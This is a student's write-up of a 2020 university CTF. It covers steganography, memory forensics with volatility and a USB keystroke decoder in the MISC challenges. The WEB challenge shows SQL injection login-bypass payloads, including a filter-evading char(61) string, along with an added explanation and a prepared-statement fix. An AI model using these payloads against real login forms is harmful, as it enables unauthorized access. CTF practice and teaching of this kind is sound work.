2020 University Anti-"Epidemic" CTF: Partial Write-up

2020 University Anti-"Epidemic" CTF

MISC

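  • 0x01 Simple MISC

After downloading the file, steganography seemed the most likely trick, so I ran binwalk on it and found that the image contains hidden files.

Separating them with foremost yields ctf.txt.

The file contains a string of Morse code.

Decoding it gives the password for the archive.

Finally, base64-decoding the result yields the flag.

  • 0x02 2019-nCoV
    Sign-in challenge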

flag{shijiejiayou}

  • 0x03 ez_mem&usb

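Extracting the archive gives a pcap file. Open it in Wireshark and export the HTTP objects to get upload_file.zip, which extracts to data.vmem.
Analyze the image: volatility -f data.vmem imageinfo
List processes: volatility -f data.vmem --profile=WinXPSP2x86 pslist
Inspect the cmd process: volatility -f data.vmem --profile=WinXPSP2x86 cmdscan

Found password: weak_auth_top100
With a password in hand, I guessed that there might be a zip file that needs it, so I ran foremost on the image. The recovered zip file does ask for a password when opened, and extracting it yields usbdata.txt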


A script found online decodes it:

# coding: utf-8
# Decode USB HID keyboard reports, one colon-separated 8-byte report per line.
# Each map entry is "<unshifted><shifted>".
usb_codes = {
   0x04:"aA", 0x05:"bB", 0x06:"cC", 0x07:"dD", 0x08:"eE", 0x09:"fF",
   0x0A:"gG", 0x0B:"hH", 0x0C:"iI", 0x0D:"jJ", 0x0E:"kK", 0x0F:"lL",
   0x10:"mM", 0x11:"nN", 0x12:"oO", 0x13:"pP", 0x14:"qQ", 0x15:"rR",
   0x16:"sS", 0x17:"tT", 0x18:"uU", 0x19:"vV", 0x1A:"wW", 0x1B:"xX",
   0x1C:"yY", 0x1D:"zZ", 0x1E:"1!", 0x1F:"2@", 0x20:"3#", 0x21:"4$",
   0x22:"5%", 0x23:"6^", 0x24:"7&", 0x25:"8*", 0x26:"9(", 0x27:"0)",
   0x2C:"  ", 0x2D:"-_", 0x2E:"=+", 0x2F:"[{", 0x30:"]}",  0x32:"#~",
   0x33:";:", 0x34:"'\"",  0x36:",<",  0x37:".>", 0x4f:">", 0x50:"<"
   }

def code2chr(filepath):
    lines = []
    pos = 0
    with open(filepath, "r") as f:
        for x in f:
            x = x.strip()
            if len(x) < 8:
                continue            # skip blank or truncated lines
            code = int(x[6:8], 16)  # key code, i.e. the third byte
            if code == 0:
                continue
            # newline or down arrow - move down
            if code == 0x51 or code == 0x28:
                pos += 1
                continue
            # up arrow - move up (never above the first line)
            if code == 0x52:
                pos = max(pos - 1, 0)
                continue

            while len(lines) <= pos:
                lines.append("")
            # select the character based on the Shift key; key codes that
            # are not in the map are ignored instead of raising KeyError
            if code in usb_codes:
                chars = usb_codes[code]
                # modifier byte (first byte): 0x02 = left Shift, 0x20 = right Shift
                shift = int(x[0:2], 16) & 0x22
                lines[pos] += chars[1] if shift and len(chars) > 1 else chars[0]

    for x in lines:
        print(x)

if __name__ == "__main__":
    code2chr('usbdata.txt')


WEB

  • 0x01 sqlcheckin

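Source code: [image]

This is an SQL injection challenge. Faced with a login form, the first thing to try is the classic universal password:
admin' or 1=1-- -
It appears to be filtered out.
From reading an expert's write-up, I learned that the solution is a newer kind of SQL injection universal password:
https://www.secpulse.com/archives/76200.html
It works by constructing a false = false comparison, which evaluates to true:
select * from users where username = 'mamba1'= 'x1' and passwd = 'mamba2' = 'x2'
The SQL statement above is equivalent to
select * from users where true
In the challenge, = is filtered. I originally wanted to use like instead, but that does not work either. I later learned that char(61) can be used to get around the filter.
payload: username=mamba'%2bchar(61)%2b'&password=mamba'%2bchar(61)%2b'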
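
How MySQL evaluates the two WHERE forms above, followed by a bound-parameter version of the login query. This is an added example, not code from the original post or from the challenge; the sample rows and the statement name login are constructed, and the shape of the login query is assumed from the query quoted above.

```sql
-- Constructed sample data; table and column names follow the query on the page.
CREATE TEMPORARY TABLE users (username VARCHAR(32), passwd VARCHAR(64));
INSERT INTO users VALUES
  ('admin',    'S3cret!'),   -- non-numeric string: casts to 0
  ('1337user', 'S3cret!');   -- leading digits: casts to 1337

-- 1. The "false = false" form, one comparison at a time.
--    `a = b = c` is parsed as `(a = b) = c`.
SELECT username,
       (username = 'mamba1')        AS inner_cmp,  -- 0 for both rows
       (username = 'mamba1') = 'x1' AS outer_cmp   -- 0 = 'x1' -> 0 = 0 -> 1
FROM users;

-- 2. The form used once '=' is filtered: '+' is numeric addition in MySQL,
--    so 'mamba' + CHAR(61) + '' is 0 + 0 + 0 = 0 and the test becomes
--    username = 0, which compares both sides as numbers.
SELECT username,
       'mamba' + CHAR(61) + ''            AS rhs,      -- 0
       username = 'mamba' + CHAR(61) + '' AS matches   -- admin: 1, 1337user: 0
FROM users;

-- Each implicit string-to-number cast raises warning 1292
-- ("Truncated incorrect DOUBLE value"), visible when reviewing the query.
SHOW WARNINGS;

-- 3. Hardened form: bind the inputs so they stay string data and are
--    never parsed as part of the statement.
PREPARE login FROM
  'SELECT username FROM users WHERE username = ? AND passwd = ?';
SET @u = 'mamba''+char(61)+''', @p = 'mamba''+char(61)+''';
EXECUTE login USING @u, @p;   -- empty set: the input is compared as a literal string
DEALLOCATE PREPARE login;
```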

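Summary:

From this competition I learned a new kind of SQL injection universal password, git leaks, the volatility forensics tool, and some filter bypasses for SQL injection.
Finally: stay strong, Wuhan; stay strong, China.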
